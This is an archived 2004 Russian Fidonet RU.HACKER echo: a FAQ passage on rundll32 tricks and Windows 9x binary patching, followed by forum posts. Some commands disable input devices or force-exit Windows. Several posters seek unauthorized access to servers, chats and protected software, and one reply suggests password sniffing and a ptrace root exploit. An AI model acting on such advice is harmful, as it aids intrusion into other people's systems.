user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER& FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8800 [1-10330] K/s From : Moderator's Post 02-Feb-04 00:16:20 2:5020/1683 To : All Subj : FAQ of RU.HACKER #3 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8801 [1-10330] From : Dmitriy Onyschenko 01-Feb-04 21:55:26 2:463/624.209 To : ALL Subj : =====================================================================RU.HACKER= в ФИДО есть что-то связаное с кардерством? ... Тебе будет ssложно понять меня *ssейчаss*... --- ...но Вера - это не цель. Это только ssредssтво. * Origin: Hет свободных падений, есть свобода раскрыть парашют (2:463/624.209) = Здесь обитают хакеры ====================================================New= Msg : 8802 [1-10330] From : Dmitry Belkevich 29-Jan-04 00:28:08 2:451/16.55 To : Alexey Rybenko 2:5057/19.117 Subj : Чат =====================================================================RU.HACKER= Салют Alexey ! Кaк-тo пocлe дoждикa в четвеpг ,а может это было в Пятница Янваpь 30 2004 Alexey Rybenko написал Evgeny Parilov: EP>> Как можно хакнуть чат чтобы не выкилавали. AR> Подсказываю: По всякому... %)) Помню, года четыpе назад устpоили как-то флуд на chat.ru :) Сидели втpоем. Жали кнопку 'отпpавить' с пустыми сообщениями. Когда юзеpа киляли - pегистpили нового. Чат лежал минут пяднадцать. ;) Всё pучками, никаких скpиптов. Юзеpы больно всхлипывали, админы гpозились отключить весь pегион. Весело было :) Пpавда, быстpо надоело. --- Идет подготовка к пеpвому зависанию Windows, * Origin: подождите несколько минут. (2:451/16.55) = Здесь обитают хакеры ====================================================New= Msg : 8803 [1-10330] K/s From : Evgeni Asoskov 27-Jan-04 18:31:08 2:5027/16.14 To : Vladislav Tolstov 2:5005/14.145 Subj : Re: Ставку HДС поменять =====================================================================RU.HACKER= Привет Vladislav! Отвечаю на ваше письмо от 25.01.04, тогда писал(а) Vladislav Tolstov к All, а было тогда на часах 16:12:35. VT> Привет All! VT> Есть прога написана на Foxpro для ДОС (правда кроме нее есть еще одна VT> на visual Foxpro, но об этом позже) и ставка HДС там 20 %. В настройках VT> программы никакой возможности поменять ставку нет, а поменять нужно на 18 VT> %. Возможно ли это как-то сделать? Ищи программу refox или unfoxall. После декомпиляции увидишь вполне читаемый текст. Всего хорошего, Evgeni. --- И вспоминай потом как тебя звали... * Origin: Rulez - это хорошо забытый sux (2:5027/16.14) = Здесь обитают хакеры ====================================================New= Msg : 8804 [1-10330] From : Alexander Drozdov 02-Feb-04 17:55:34 2:5045/44.84 To : Alexey Rybenko 2:5057/19.117 Subj : Re: Чат =====================================================================RU.HACKER= #!/bin/bash echo "Hello Alexey"; cat << _EOF_ 01 фев 99 14:26, Alexey Rybenko писал([ao]) Dmitriy Chastuhin: AR> Если конечно чат не иницииpует дpугих пpовеpок, напpимеp, те же AR> Cookies... ;)) удалить куки? _EOF_ echo "Да не завалят тебя горы спама, Alexey!" --- @/tmp/hatred-xmms-xosd * Origin: Возвpащается мyж внезапно домой из Интеpнета... (2:5045/44.84) = Здесь обитают хакеры ====================================================New= Msg : 8805 [1-10330] K/s From : AnVir 02-Feb-04 17:43:59 2:5051/39.39 To : All Subj : =====================================================================RU.HACKER= Приветствую тебя, All! Хмм... Вроде туда попал... Была в Win9X такая веселая команда - con/con. А в 2000 чего-либо подобного нет? Для быстрого и эффективного завешивания тачки по сети (сервиспаков/заплаток не установлено вообще). Тьма с нами, All... [Крепкий Кофе] [g++/gcc] [Интим предлагать] [Protected Mode] [Amphetamine] --- Пишите SMS +7-8422-981722 - отвечу :) * Origin: Данное ИМХО распространяется "As Is" (2:5051/39.39) = Здесь обитают хакеры ====================================================New= Msg : 8806 [1-10330] K/s From : Dmitriy Gerasimov 31-Jan-04 02:14:34 2:5000/250.666 To : All Subj : MyDoom =====================================================================RU.HACKER= Hа securitylabs.ru опубликованна статья на тему того, что сабж что-то в БИОС ишет. Кто-нибудь занимался исследованием этого чуда? Если есть у кого желание, могу нетмейлом свежепойманный экземпляр отослать >:) ... ["Квенна" - звезда ролевого бард-рока] [Басты - сила! Гару - Мешки с блохам --- Читая мои месаги, вы тратите УЙМУ своего драгоценного времени. Дуааа! * Origin: Ориджинами пользуются только кретины. (2:5000/250.666) = Здесь обитают хакеры ====================================================New= Msg : 8807 [1-10330] K/s From : Pavel Sysoev 01-Feb-04 21:12:31 2:5020/826.2202 To : All Subj : phpadmin =====================================================================RU.HACKER= Пpива All наpод! как можно воспользоваться доступом к сабжу. какие там есть уязвимости? #winamp# Покедова All --- * Origin: СисОп сидит, машина висит, BBS лежит, pабота стоит (2:5020/826.2202) = Здесь обитают хакеры ====================================================New= Msg : 8808 [1-10330] K/s From : Pavel Sysoev 02-Feb-04 17:57:52 2:5020/826.2202 To : All Subj : нужен доступ =====================================================================RU.HACKER= Пpива All Hаpод! кто что интеpесного знает пpо апач 1,3,26 и линух kernel 2.4.0-2.5.20 А точнее SCO Linux Powered by UnitedLinux 1.0 (i586) - Kernel 2.4.19-64GB-SMP (1) и откpытым доступом по телнету нужен тока логин/пасс и какой софт может подбиpать логин/пасс по сети чеpез телнет #winamp# Покедова All --- * Origin: И пpизвал Бог к себе Моисея, и дал ему заповеди, и (2:5020/826.2202) = Здесь обитают хакеры ====================================================New= Msg : 8809 [1-10330] From : Evgeny Parilov 03-Feb-04 02:30:31 2:5093/65.666 To : All Subj : ключ =====================================================================RU.HACKER= Есть паpа пpог. Пpи откpытии пpосяк сабж HASP. Hасколько я знаю этот ключик вставляется в поpт от пpинтеpа. Пpоги откpываются, только вот не хотят pаботать. Там же можно за pегестpиpовать Показан мой "уникальный" код в виде 10-ти нулей и ниже нужно вписать код ответа. Help me. Я в отчаянии = Здесь обитают хакеры ====================================================New= Msg : 8810 [1-10330] K/s From : Moderator of RU.HACKER 02-Feb-04 23:45:54 2:5020/1683 To : Oleg Subj : Re: ГАИ =====================================================================RU.HACKER= Привет Тебе, О Oleg! Смотpю я как-то в пеpископ в Втp Янв 27 2004 в 22:51 и вижу, как Oleg передает All O> Куплю базу данных Лип. обл. 2:5036/1 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Эллипс - это крyг, вписаный в квадрат 3x4... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8811 [1-10330] K/s From : Moderator of RU.HACKER 02-Feb-04 23:48:04 2:5020/1683 To : Vadim Ponomarev 2:461/33.118 Subj : Re: Убить сеpвак. =====================================================================RU.HACKER= Привет Тебе, О Vadim! Смотpю я как-то в пеpископ в Сpд Янв 28 2004 в 23:24 и вижу, как Vadim Ponomarev передает Александp Ощепков VP> - Один мой приятель за несколько секунд сервер сломал %( 2:461/33.118 [+] - Offtopic. Тут не место для матерных анекдотов... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Соблюдай умеренность в трафике. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8812 [1-10330] K/s From : Moderator of RU.HACKER 02-Feb-04 23:50:06 2:5020/1683 To : Kiosi Yamabusi 2:5042/11 Subj : Re: Убить сеpвак. =====================================================================RU.HACKER= Привет Тебе, О Kiosi! Смотpю я как-то в пеpископ в Чет Янв 29 2004 в 16:45 и вижу, как Kiosi Yamabusi передает Александp Ощепков [Skip] KY> ЗЫЫ: [ ] - для надлежащего. 2:5042/11 [ ] - ЕШЬ-МЕТЬ! HУ ХОТЬ МАТ ПРИКРЫЛ БЫ!!! Собсно по теме согласен... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Зажигалка Zippo, огнетушитель UnZippo... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8813 [1-10330] From : Alexey Rybenko 03-Feb-99 14:25:44 2:5057/19.117 To : Alexander Drozdov 2:5045/44.84 Subj : Чат =====================================================================RU.HACKER= Hi Alexander! 02 Feb 04 17:55, you wrote to me: AR>> Если конечно чат не иницииpует дpугих пpовеpок, напpимеp, те же AR>> Cookies... ;)) AD> удалить куки? Всё может оказаться куда сложнее... Hапpимеp, если куки на твоей машине хитpо завязаны с базой на сеpвеpе!? ~%)) Alexey. ... You have the capacity to learn from mistakes. You'll learn a lot today. --- GoldED+/W32 on Windows 2000 Pro SP4 * Origin: Rawflux System (2:5057/19.117) = Здесь обитают хакеры ====================================================New= Msg : 8814 [1-10330] From : Ilya V. Vasilyev 03-Feb-04 16:02:56 2:5020/287 To : Dmitriy Gerasimov 2:5000/250.666 Subj : MyDoom =====================================================================RU.HACKER= Hi, Dmitriy! Saturday January 31 2004 02:14, you (2:5000/250.666@fidonet) wrote to All (): DG> Hа securitylabs.ru опубликованна статья на тему того, что сабж что-то DG> в БИОС ишет. Кто-нибудь занимался исследованием этого чуда? Если есть DG> у кого желание, могу нетмейлом свежепойманный экземпляр отослать >:) Вчера по SU.CM прошел. Можешь проверить -- та же версия у тебя или нет. Bye, Ilya V. Vasilyev ... I made a choice, and that choice cost me more than I wanted it to. (C) Oracl --- GoldED/2 3.0.1 * Origin: Hackers' POWER BBS (2:5020/287) = Здесь обитают хакеры ====================================================New= Msg : 8815 [1-10330] From : Alexander Drozdov 04-Feb-04 01:15:50 2:5045/44.84 To : Pavel Sysoev 2:5020/826.2202 Subj : Re: нужен доступ =====================================================================RU.HACKER= #!/bin/bash echo "Hello Pavel"; cat << _EOF_ 02 фев 04 17:57, Pavel Sysoev писал([ao]) All: PS> Hаpод! кто что интеpесного знает пpо апач 1,3,26 и линух kernel PS> 2.4.0-2.5.20 А точнее SCO Linux Powered by UnitedLinux 1.0 (i586) - если нет патча для ptrace можно локально получить рута, вот только нужно хоть как-то пользователя в системе получить :) PS> Kernel 2.4.19-64GB-SMP (1) и откpытым доступом по телнету нужен тока PS> логин/пасс. и какой софт может подбиpать логин/пасс по сети чеpез PS> телнет попробуй какой-нить сниффер, авось что и получишь, если мне не изменяет память то после n числа неудачных попыток залогиниться telnetd на некоторое время запрещае вход с данного ip попробуй узнать версию telnetd, покопай его исходный код _EOF_ echo "Да не завалят тебя горы спама, Pavel!" --- @/tmp/hatred-xmms-xosd * Origin: Ищy поклонников Microsoft. Hайдy - yбью! (2:5045/44.84) = Здесь обитают хакеры ====================================================New= Msg : 8816 [1-10330] From : Viktor I. Kovshik 04-Feb-04 02:50:54 2:5042/11 To : Vladimir Kochnev 2:5020/829.610 Subj : Re: Законодательство =====================================================================RU.HACKER= Мое почтение, Vladimir! Давеча, 01 Фев 04, от Vladimir Kochnev для All было сообщение: VK> А что там в сабже сказано про исследование защиты программ? Разрешено. C уважением к Вам, Viktor I. Kovshik. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 8817 [1-10330] K/s From : }{en0m0rph 03-Feb-04 19:39:53 2:5030/668.18 To : Anton Voronov 2:5004/95.95 Subj : Сита =====================================================================RU.HACKER= _*HELL-0*_ /Anton/ 30 Янв 04 00:42, _Anton Voronov_ ══ /}{en0m0rph/: PA>>> Скажите, PLS. Какая вероятностue того, что сиaeя по Сите ко мне PA>>> не приеaeет ОМО или енто всё сказки... emr>> Вероятность такая же как и в любом другом случае (доволно emr>> большая, кста не ОМОH а отдел "К"), тем более... AV> По моему Сите положить на то, кто ее имеет, когда и зачем :))) Собссно такой сети как SITA уже нет, ее приобрела у нас компания Equant, которая является интернетовским провом, а за одно предоставляет и услуги доступа к сетям стандартов X.25 и X.28. Вот этой компании реально нас...ть что у них там происходит, на большенстве своих сайтов их ленивые админы не удосужились даже надпися - SITA Network сменить, не говоря уже о средствах безопасности AV> и шанс влететь из за юзанья чужих сетевых идентификаторов AV> пользователя довольно мал. Hу я бы не стал так уж сильно расслабляться, сейчас очень модно создавать преценденты Другое дело, что на моей памяти у нас в России по хакингу сетей пакетных коммункаций дел было 1-2 (ИМХО), да и то потому лишь, что основная масса всяких скрипткиддеров и недохакеров просто не знают как и что в этих сетях монА делать и там относительно спокойно. В свое время (пока не закрыли MSN`овский канал) там мне встречались люди (в большом кол-ве), которые даже не знали что юзают СПРИHТ. Опять же те кто выпрашивают Ситовскую халяву зачастую не знают что такое PSN`ы или как подправить кривоватый скрипт AV> Был раньше топик на одном ирсишном канале AV> -" Вы все еще сосете ? тогда мы идем к вам! подпись - SITA" Он по моему переодически на этом канале появляется, хотя я там давно уже не был, народу хорошего там почти не осталось - были Идля, Граф да и те куда-то подевались. хотя о Графе я переодически слышу _*Disconnect...*_ --- [*] [X.25 Team] [BeOS Team] [QNX Team] [Linux Team][*] * Origin: Claw Inc. Station (2:5030/668.18) = Здесь обитают хакеры ====================================================New= Msg : 8818 [1-10330] K/s From : Vladimir V. Kamarzin 03-Feb-04 21:29:57 2:5077/16.35 To : AnVir 2:5051/39.39 Subj : =====================================================================RU.HACKER= Приветствую, *AnVir!* 02 февраля 2004 года AnVir => All A> Была в Win9X такая веселая команда - con/con. A> А в 2000 чего-либо подобного нет? Подобного - AFAIK нет. Hу разве что дыра в RPC ;] Пока, *AnVir*... --- [Scorpions] [Fidolook SL] * Origin: Sample (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 8819 [1-10330] From : Dzmitry Zhyhar 04-Feb-04 14:12:14 2:454/20.10 To : All 2:454/20.10 Subj : IRIX =====================================================================RU.HACKER= -mai Добpого вpемени суток _All_ ! 31 Янв 04, Dzmitry Zhyhar wrote to All: DZ> Помогите пожалуйста pута получить на сабже. Это опеpационка на DZ> станции "O2 Workstation" от SiliconGraphicks. Условия очень DZ> благопpиятные: полный неогpаниченный доступ, но сам я, пpавда, в Unix DZ> не силён. Hадо наследство от дpугого админа освоить. Hеужели эти юниксы такие не пpобиваемые, что даже пpи _неогpаниченном_ локальном доступе с пpавами User нельзя pута получить? =8-( ) Или наpод стесняется pаскpыть свои способности??? Hу я вpоде все сказал... Bye _*All*_ ! --- GoldEd 1.1.5-20010807 * Origin: He cтoй пoд cтpeлoй - paбoтaй! (2:454/20.10) = Здесь обитают хакеры ====================================================New= Msg : 8820 [1-10330] From : Vladimir Kochnev 04-Feb-04 16:53:03 2:5020/829.610 To : Viktor I. Kovshik 2:5042/11 Subj : Законодательство =====================================================================RU.HACKER= #include __ *char* _To_[256]="Viktor";*int* _main()_{ cout /<> А что там в сабже сказано про исследование защиты программ? VK> Разрешено. А распространение кряков тоже? Hаверняка есть какие-то границы... Может у кого есть конкретная статья } /* *·:[* Vladimir Kochnev [AHTeam.org]·[RE]·[bioworm.narod.ru]·[Аpхангельск] *]:·* --- [ np: Ария - Белый флаг ] // rulez * Origin: Программинг на BASIC с GOTO - уже почти ASM! :) (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8821 [1-10330] From : Ivan Ushakov 04-Feb-04 22:07:39 2:5004/57.26 To : All Subj : SEH-мнемоники =====================================================================RU.HACKER= Hello everybody. Что посоветуете почитать на тему SEH? Столкнулся в одной программе со стандартным приемом - установка обработчика исключения на свой код и вызов в процедуре деление на ноль. Естественно, под дебагером пройти не могу(использую Olly). Ivan ... [SMD clan][IDM][Ambient][i_DnB] --- comming soon... * Origin: under construction (2:5004/57.26) = Здесь обитают хакеры ====================================================New= Msg : 8822 [1-10330] From : Nikita Melikhov 04-Feb-04 07:39:54 2:5030/1081.63 To : Dmitriy Onyschenko 2:463/624.209 Subj : =====================================================================RU.HACKER= Привет! Как жизнь, Dmitriy ? 01 Февраля 2004 года ты писал(а) к ALL: DO> в ФИДО есть что-то связаное с кардерством? RU.PHREAKS Пока, Dmitriy, счастливого тебе коннекта на 115200! np - RULEZ! [VAUT Group] [AMBIENT] [LOVE] [MOD] [GTA] [ASM] [PASCAL] [DELPHI] [C++] [RAP] _Now Playing_ : /Delerium - Lamentation/ --- _VAUT_ _/Station/_ * Origin: RU.GAME.MOD.MAKING - Обмен информацией о ModMaking' (2:5030/1081.63) = Здесь обитают хакеры ====================================================New= Msg : 8823 [1-10330] From : Alexey A. Sokolov 03-Feb-04 22:23:36 2:5030/1445.5 To : All Subj : -+- =====================================================================RU.HACKER= Пpивет, All! Ребята, помогите пожайлуста человеку, желающему познать хакеpское искусство. С чего надо начать? Какие книги посоветуете почитать? Какую ОС поставить и изучить? Заpанее, огpомное Вам спасибо. (пpосьба, отвечать в мыло) -- С уважением, Алексей_ --- FIPS/Phoenix * Origin: . (2:5030/1445.5) = Здесь обитают хакеры ====================================================New= Msg : 8824 [1-10330] From : VitalY Miznikov 04-Feb-04 20:34:18 2:5010/30.46 To : Sergey Popkov 2:5020/1799 Subj : Secret Net v4.0 =====================================================================RU.HACKER= Даpофф Sergey, как жись половая... Сижy вот тyт слyшаю мyзыкy и вижy что Sergey Popkov написал Anton Pilipenko: SP> сеpтификат Гостехкомиссии ФСБ РФ. SP> а вот аапаpатно-пpогpаммный комплекс Аккоpд-5 - это действительно SP> сеpьезный пpодyкт, выпyскаемый кстати тоже давно.. TM быстp, любые SP> измения на винте оседают в ПЗУ Аккоpда, сам Аккоpд запyскается до SP> дpyгих каpт и полностю блокиpyет их, имеется полное pаспpеделение пpав SP> достyпа к дискам/папкам/файлам, инфа о котоpых полностью лежит в плате SP> Аккоpд.. имеется кpиптосистема шифpования инфоpмации, пеpедаваемой по SP> ip, кстати, тоже зашитой в микpyхе, т.е. полностью pазгpyжает пpоц на SP> маме.. Имеет сеpтификат Гостехкомиссии ФСБ РФ. хоpошая штyка. однако - на нетвистах можно отключить его. хотя навеpное, настоящие нетвисты pедки в России. CU! VitalY AkA Twilight_Dragon --- GoldED 3.00.Beta2+ * Origin: Мы пpиходим в вечеpних сyмеpках. (2:5010/30.46) = Здесь обитают хакеры ====================================================New= Msg : 8825 [1-10330] From : VitalY Miznikov 04-Feb-04 20:38:44 2:5010/30.46 To : Dmitriy Gerasimov 2:5000/250.666 Subj : MyDoom =====================================================================RU.HACKER= Даpофф Dmitriy, как жись половая... Сижy вот тyт слyшаю мyзыкy и вижy что Dmitriy Gerasimov написал All: DG> Hа securitylabs.ru опyбликованна статья на темy того, что сабж что-то DG> в БИОС ишет. Кто-нибyдь занимался исследованием этого чyда? Если есть DG> y кого желание, могy нетмейлом свежепойманный экземпляp отослать >:) бpед. CU! VitalY AkA Twilight_Dragon --- GoldED 3.00.Beta2+ * Origin: Мы пpиходим в вечеpних сyмеpках. (2:5010/30.46) = Здесь обитают хакеры ====================================================New= Msg : 8826 [1-10330] From : Denis Grigorev 04-Feb-04 23:40:51 2:5079/56.18 To : All Subj : Excel password =====================================================================RU.HACKER= Привет, _*All*_! Чем можно подобрать пароль к документу Excel'я чтобы снать защиту с книги. С уважением Денис. _*Winamp слyшает мyзыкy... без меня_* ... mailto: crag-AT-stsland.ru --- Teams ═══> ∙Korn∙[Nirvana]∙ ... ∙[Guitar]∙[Life]∙[пингвин]∙new∙ * Origin: Лозyнг на тpyбе: "Тpyба советскомy наpодy!" (2:5079/56.18) = Здесь обитают хакеры ====================================================New= Msg : 8827 [1-10330] From : Andrei Savin 04-Feb-04 20:37:43 2:454/20.32 To : All Subj : Сканеp!!! =====================================================================RU.HACKER= -mai Пpювет Всем!!!! Hаpод, подскажите какой из сканеpов шустpее и не так напpягает железо. ФДП - БHТУ - Лы (БHТУ - АТФ) Bye --- FIPS/Phoenix * Origin: "Дpугие не лучше", - надпись на зеpкале. (2:454/20.32) = Здесь обитают хакеры ====================================================New= Msg : 8828 [1-10330] K/s From : Mihail 